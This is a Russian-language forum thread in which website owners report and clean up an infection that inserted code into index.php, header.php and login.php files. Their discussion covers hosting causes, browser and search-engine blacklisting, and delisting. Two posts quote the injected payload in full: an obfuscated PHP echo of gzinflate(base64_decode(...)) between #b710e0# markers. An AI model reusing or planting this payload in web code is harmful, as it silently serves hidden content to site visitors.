|
Категории |
ВирусыСегодня уже на двух сайтах пришлось удалять вирусные коды. #b710e0# echo(gzinflate(base64_decode("1VfBcpswEP2V1odg1xlHWoGAIfSSey/tzeMDY5OYGWOnmKTtZPLvNbtCWgxO7UwuPdgjxEr7tPv2rbjdL6visf76nFWf9qnnJXX152Wb//qU7VdzsXhdZvVyPf45eSnuD/9VKpNl+r2uiu1D8nqYqq6uVrvlU5lv69myyrM6/5H/rr/tVvmkTiHJ0/w52yRlOvdnwZf6WkY39XUAOAbhHx6kPgwj0UyLZhLgMPRjslCNReAb8+ZNQPPNEBTOalw6c/PK2Ev+hhybB0B3Ea5ohgp38tEzNChj9CsJctDs40f9fRC1JKgyRm+Bgdq80WQVNitAmOMjcB+H2s2Djz5ciNojIFCJmKMTKOgNNMGj3ePeNoFoA22C6Nujm010c2Atj1caP+/Ji8KloTtFZG0Rq27eK3HuKRFgELITGywSgZksgIhcZhFWc2iJTACFJjy1dCibNG1DQzCBZbbFRNRRPD1uMZ5cxhHbFM8Aij3Y09nFsUVq8CNo0HbYwYzYlGAlBJE1oqHEoWNiGyrcHQK2D9C8bhMg0R5Cx1yijerULctn5MAQ0YkUGDOTFEodOKoAjze4uj1nm5AVuhb9Qu/SQWnmj/jOk9q+kR0ztrWUDqN0GiXEsZiYogPwWe65Q0NH6PDOejCcMKhCbuS7emMVFA9InLBGhvAoM9JVBBxXhDNoVQzxY1US57hSYzEbLvLSV7It51bljhVEQ0+SDFgWQqstw4HSZ+PBedTmf6ir6hS2I7vrS4ZN2iU9MImKGPwTvSXmignMxmB26bykY/Gmc5Zyhr3M4AISnZDHDamjxJGCOgn340EuitbJkDyTd7AmrtwNJ1Gq4pZwrVIK3k2JBLIfo9iiMiElC84UChyt7SYEHG84h2TcW04NDZyMUZVIVvJt4EVPikhWJbAqxwcwD8LKCpEKkNWUEMFMQHPFp30YFXjrNzbKaVBk7ze8v6kPkciB/tvpE6J7RyBCvAPo5dLKkVFaDYMFb9CaVbKC47p5B9BToszh8MZ2qihP9rgYhiT90u0/qOY7SiRYOvrFP9DU36Zt51bfSXbkNLXD1oE8dgRTcFGVgl+rbJ+8DPXH3Jb/868Y5dxpV6sdnKhwyj+6TvnWDwhHgTevEYukLNPl3Luvdt7UK+/WWXV3+Nz0Fsn9rhoXqUiKz2k52+Tbh3qdFNPpZD9Ny3Kcj0flaDqaH37FaOotvMkEv3Xt52v2+JhvV3frYrMab582m4n79s3H+0nyentjvpX/Ag=="))); #/b710e0# ммда. это не хорошо((( может какую дыру нашли? надо пройтись по сайтам. спасибо что написали. Еще на одном обнаружилось, но этот не ShopOs (и не VamShop). Так что дело скорее всего в хостингах. Сегодня уже на двух сайтах пришлось удалять вирусные коды. В нескольких файлах с названиями вида index.php, default.php, header.php появилась вставка кода, видимо, вредоносная, такая: #b710e0# echo(gzinflate(base64_decode("1VfBcpswEP2V1odg1xlHWoGAIfSSey/tzeMDY5OYGWOnmKTtZPLvNbtCWgxO7UwuPdgjxEr7tPv2rbjdL6visf76nFWf9qnnJXX152Wb//qU7VdzsXhdZvVyPf45eSnuD/9VKpNl+r2uiu1D8nqYqq6uVrvlU5lv69myyrM6/5H/rr/tVvmkTiHJ0/w52yRlOvdnwZf6WkY39XUAOAbhHx6kPgwj0UyLZhLgMPRjslCNReAb8+ZNQPPNEBTOalw6c/PK2Ev+hhybB0B3Ea5ohgp38tEzNChj9CsJctDs40f9fRC1JKgyRm+Bgdq80WQVNitAmOMjcB+H2s2Djz5ciNojIFCJmKMTKOgNNMGj3ePeNoFoA22C6Nujm010c2Atj1caP+/Ji8KloTtFZG0Rq27eK3HuKRFgELITGywSgZksgIhcZhFWc2iJTACFJjy1dCibNG1DQzCBZbbFRNRRPD1uMZ5cxhHbFM8Aij3Y09nFsUVq8CNo0HbYwYzYlGAlBJE1oqHEoWNiGyrcHQK2D9C8bhMg0R5Cx1yijerULctn5MAQ0YkUGDOTFEodOKoAjze4uj1nm5AVuhb9Qu/SQWnmj/jOk9q+kR0ztrWUDqN0GiXEsZiYogPwWe65Q0NH6PDOejCcMKhCbuS7emMVFA9InLBGhvAoM9JVBBxXhDNoVQzxY1US57hSYzEbLvLSV7It51bljhVEQ0+SDFgWQqstw4HSZ+PBedTmf6ir6hS2I7vrS4ZN2iU9MImKGPwTvSXmignMxmB26bykY/Gmc5Zyhr3M4AISnZDHDamjxJGCOgn340EuitbJkDyTd7AmrtwNJ1Gq4pZwrVIK3k2JBLIfo9iiMiElC84UChyt7SYEHG84h2TcW04NDZyMUZVIVvJt4EVPikhWJbAqxwcwD8LKCpEKkNWUEMFMQHPFp30YFXjrNzbKaVBk7ze8v6kPkciB/tvpE6J7RyBCvAPo5dLKkVFaDYMFb9CaVbKC47p5B9BToszh8MZ2qihP9rgYhiT90u0/qOY7SiRYOvrFP9DU36Zt51bfSXbkNLXD1oE8dgRTcFGVgl+rbJ+8DPXH3Jb/868Y5dxpV6sdnKhwyj+6TvnWDwhHgTevEYukLNPl3Luvdt7UK+/WWXV3+Nz0Fsn9rhoXqUiKz2k52+Tbh3qdFNPpZD9Ny3Kcj0flaDqaH37FaOotvMkEv3Xt52v2+JhvV3frYrMab582m4n79s3H+0nyentjvpX/Ag=="))); #/b710e0# Тоже самое у меня, ((( Мартин привет! Что-то случилось с сайтом сайт.ru, вот что пишет: "Это известный небезопасный веб-узел сайт.ru Рекомендуется завершить работу на этом веб-узле. Вместо этого перейти на домашнюю страницу Корпорация Майкрософт получила сведения о небезопасном веб-узле, содержащем угрозы для компьютера, личных и финансовых сведений." Почистил index.php и login.php вроде эти два фаила, еще ковыряюсь. Еще один клиент сегодня написал, что браузер не пускает на сайт!
Если вы кому не будь отправляли в форуме данные о сайте (БД, FTP) То меняйте пароль, Та же фигня, с утра, почистил логин.пхп и индекс.пхп вреданосный код в самом конце Если вы кому не будь отправляли в форуме данные о сайте (БД, FTP) То меняйте пароль, По ходу утечка инфа с форума. Не надо поднимать панику! Никакой утечки с форума нет! Вредоносный код внедряется никак не вручную по FTP, все сложнее. И пароли тут не при чем. Проблемы на уровне хостинга. Сейчас вот удалил вирус такой же с сайта WebAsyst. А хостинг не Мастехост? За вчера-сегодня удалял вирусы на У меня чисто. Хостинг servage.net . В профиле на форуме указан основной сайт который на DLE. В случае обнаружения подобных вещей, обязательно меняйте пароли на FTP, SSH. По-моему, пароли тут не при чем. Проблемы на уровне хостинга. Удалил вирус на одном сайте. В IE, Опере все нормально теперь, а FF по-прежнему дает красную рамку с предупреждением о вирусе на сайте. Что делать? Кэш и куки не пробовал чистить? Иногда старая инфа в FF задерживается. На хостингах где был вирус одинаковые панели? Очистил. Эффекта никакого, то же самое. FF тянет инфу о вирусах с гугла, если он зарегистрин в гугл вебмастерс - зайдите и тыкните "перепроверить", если нет, то зарегистрируйте его там Сегодня опять пришлось удалить вирус, уже второй раз >:( на одном и том же сайте. Аналогично. Плохо то что yandex забанил сайт :-[ Очистил. Эффекта никакого, то же самое. В сообщении о вирусе была когда-то ссылка на сайт, который предоставляет FF инфу о зараженных сайтах. Стучитесь туда, они перепроверяют и выводят из бана. У меня давно когда-то такое было. Чтобы повторно вирус не заразил, выставите права доступа "только чтение" |
|
|